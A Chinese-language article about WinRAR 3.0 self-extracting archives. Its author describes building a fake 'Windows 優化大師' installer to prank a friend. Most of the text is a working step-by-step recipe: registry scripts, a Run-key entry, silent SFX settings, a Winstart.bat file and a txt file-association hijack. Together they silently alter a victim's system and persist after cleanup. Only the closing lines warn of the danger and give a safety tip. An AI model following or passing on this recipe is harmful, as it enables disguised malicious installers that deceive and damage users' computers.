與Winzip相比,Winrar3.0的自解壓程序要多出功能。其中一項最為突出的功能,也是潛在著最大危險的是:它可以在解壓前或解壓后,無聲無息地自動運行程序。
如果你不以為然,先看完以下事例:
幾天前,一位朋友要我copy一份我從網上下載的‘Windows 優化大師’給他,我靈機一動,想起這幾天研究Winrar3.0的心得,便滿口答應。到了晚上,我花了幾小時的時間為他特制了一份‘Windows 優化大師’,制作流程如下:建立一個注冊表角本文件,我取的文件名為regeditt.reg在里面寫入:REGEDIT4[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion]"RegisteredOwner"="××"[HKEY_CLASSES_ROOT\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}]@="××""InfoTip"="包含可以恢復或永久刪除的已刪除項目。"[HKEY_USERS\.DEFAULT\Software\Classes\CLSID\{20D04FE0-
3AEA-1069-A2D8-08002B30309D}]@="××的電腦" [HKEY_CURRENT_USER
\Control Panel\International]"StimeFormat"="×× HH:mm"[HKEY_LOCAL_MACHINE\Software\
Microsoft\Windows\CurrentVersion\Run]"TaskMonitoy"="regedit /s c:\\Windows\\sysbckup
\\regeditt.reg"注:以上××均是不健康的調侃他人的詞匯,編輯對它們做了凈化。
上面第一項是更改計算機注冊名稱,第二項是更改‘回收站’名稱,第三項是更改‘我的電腦’名稱。第四項是在任務欄時間前加上文字,第五項是每次開機后自動運行c:\Windows\sysbckup\regeditt.reg。
建立完成后就是用Winrar打包了,選中regeditt.reg后擊右鍵,在菜單中選‘添加到檔案文件’,在彈出對話框中,把檔案名稱寫為a1.exe,在下面存檔選項中選中‘創建自釋放格式’。然后在高級-自釋放選項中寫入釋放路徑,我寫的是c:\Windows\Sysbckup,接下來就是在‘釋放后運行’中寫入regeditt.reg,然后在模式中選中‘全部隱藏’和‘覆蓋所有文件’,完成這些后按確定,再選擇注釋我們會看到以下內容:Path=c:\Windows\SysbckupSetup=regeditt.regSilent=1Overwrite=1我們發現釋放后運行的格式是Setup=*.*,這里是=regeditt.reg,但這樣運行后系統會提示你是否確認導入注冊表,所以應作如下修改:Path=c:\Windows\SysbckupSetup=regedit /s regeditt.regSilent=1Overwrite=1完成后按確定按扭,就會建立出一個名為a1.exe的Winrar自解壓程序,如果雙擊運行它,屏幕上將沒有任何顯示,但它已無聲無息地把regeditt.reg拷貝到c:\Windows\Sysbckup,并把其中的內容寫入到注冊表中了。
現在的問題是如何讓我的朋友運行A1.exe呢?對了,用‘Windows 優化大師’。把A1.exe與‘Windows 優化大師’的安裝文件(解壓后的)放在一起打包,建立 Windows 優化大師.exe,全選后擊右鍵,選‘添加到檔案文件’……操作大致同A1.exe。只不過名稱改為 Windows 優化大師.exe,解壓路徑改成:c:\Windows\temp,而且解壓后要運行A1.exe和setup.exe兩個文件,其注釋內容應為:Path=c:\Windows\tempSetup=a1.exeSetup=setup.exeSilent=1Overwrite=1按確認后,我們已初步完成了一份特制的‘Windows 優化大師’了,為什么說‘初步’完成呢?因為現在修改注冊表和啟動項早已不是什么秘密了,所以A1.exe只不過是附料,還需要加入一味主料:A2.exe.把regeditt.reg更名另存為system.reg,去掉其中的[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]"TaskMonitoy"="regedit /s c:\\Windows\\sysbckup\\regeditt.reg"然后用計事本建立Winstart.bat,其中內容要寫成:@echo off regedit c:\Windows\system.reg>nul這樣寫屏幕上將沒有顯示,完成后把這兩個文件用Winrar作成自解壓程序A2.exe,操作同A1.exe,但解壓路徑要改成 c:\WinDOWS,解壓后也不需運行.其注釋內容應為:Path=c:\WindowsSilent=1Overwrite=1完成后把a2.exe加入做好的 Windows 優化大師.exe,加入方法是:右擊 Windows 優化大師.exe選擇‘用Winrar打開’,把a2.exe拖入,按確定,然后點擊工具欄中的注釋,修改其中內容為:Path=c:\Windows\tempSetup=a1.exeSetup=a2.exeSetup=setup.exeSilent=1Overwrite=1然后確定-退出。到此為止,特制的‘Windows 優化大師.exe’已全部完成。因為Winstart.bat是在進入Windows圖形界面之前運行的一個程序,所以加入A2.exe后,就算我的朋友能恢復注冊表,甚至刪除regeditt.reg,但只要c:\Windows下的system.reg和Winstart.bat不被發現,重啟動后他的電腦將‘××’依舊。
在Windows98中啟動程序的方法很多,如通過AUTOEXEC.BAT、Winstart.bat、開始菜單中的啟動、注冊表中的啟動項、Win.ini、system.ini、Wininit.ini和修改文件關聯等都可達到啟動程序的目的。如:用Winrar自解壓程序在注冊表中導入REGEDIT4[HKEY_CLASSES_ROOT\txtfile\shell\open\command]@="regedit /s c:\\Windows\\system.reg"那么在雙擊txt類型文件時將不會以計事本打開,而是沒有任何反應。但c:\\Windows\\system.reg中的內容也會悄無聲息的被導入注冊表。但我沒有這樣做,因為現在的這些已經夠的的朋友折騰了。
第二天,我把這份‘精裝’的 Windows 優化大師 交給了朋友,其后果可想而知。足足三天他在對著屏幕上的‘××’發愣。
以上的這些只是我用了Winrar強大的自解壓功能,和朋友開了一個小玩笑,但從上面事例不難看出,WinrarR的這些功能使不會編程的人也能制作出一些惡意的程序,如果有人給這些程序起上一些漂亮的名字(如Windows 優化大師 2002 等)在網上發布,用它來format你的硬盤、deltree你的文件等等,也不是沒有可能的。最最可怕的是,如果運行的是一個木馬程序的客戶端,那后果更加的不勘設想。
提示:不要直接運行自解壓程序,而是選擇右鍵菜單中的“用Winrar打開”。
